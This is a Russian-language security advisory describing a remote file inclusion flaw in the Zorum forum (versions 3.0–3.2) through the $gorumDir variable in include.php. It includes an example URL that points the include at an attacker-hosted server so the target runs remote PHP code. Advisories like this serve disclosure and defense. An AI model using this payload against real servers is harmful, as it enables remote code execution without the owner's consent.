Выполнение произвольных команд в PhpOutsourcing's Zorum

Дата публикации:
28.01.2003
Всего просмотров:
2974
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: PhpOutsourcing's Zorum – небольшой форум для UNIX и Windows систем.

Файл 'include.php' включает несколько других PHP файлов, используя переменную '$gorumDir'. Удаленный пользователь может создать URL, который в переменной '$gorumDir' ссылается на PHP файл, расположенный на удаленном сервере. Код, содержащийся в этом файле, будет выполнен в контексте уязвимого сервера. PHP код может включать команды оболочки операционной системы.

Уязвимые переменные используются в следующих файлах:

generformlib_multipleselection.php
generformlib_groupselection.php
generformlib_filebutton.php
group.php
Пример:
 
http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker ]/
выполнится код в файле:
'http://[attacker]/group.php'
Уязвимость обнаружена в Zorum Forum 3.0, 3.1, 3.2

Ссылки: Zorum Portal (PHP)
или введите имя

CAPTCHA